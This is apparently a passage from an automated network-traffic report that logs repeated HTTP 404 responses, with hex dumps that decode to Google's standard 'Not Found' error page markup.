65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:38 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
